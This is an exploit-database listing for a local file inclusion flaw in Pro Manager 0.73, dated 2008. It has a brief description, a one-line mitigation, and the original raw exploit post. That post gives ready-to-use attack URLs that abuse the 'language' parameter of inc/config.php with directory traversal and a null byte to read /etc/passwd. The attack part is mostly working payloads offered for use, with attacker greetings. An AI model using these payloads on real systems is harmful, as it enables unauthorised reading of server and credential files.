header-logo
Suggest Exploit
vendor:
Pro Manager
by:
Stack
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Pro Manager
Affected Version From: 0.73
Affected Version To: 0.73
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pro Manager 0.73 Local File Inclusion Vuln

An attacker can exploit this vulnerability by sending a crafted HTTP request with a maliciously crafted 'language' parameter to the vulnerable application. This can allow the attacker to read arbitrary files on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack

email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting 

# milw0rm.com [2008-06-09]

Navigation

Suggest Exploit

Services By CQR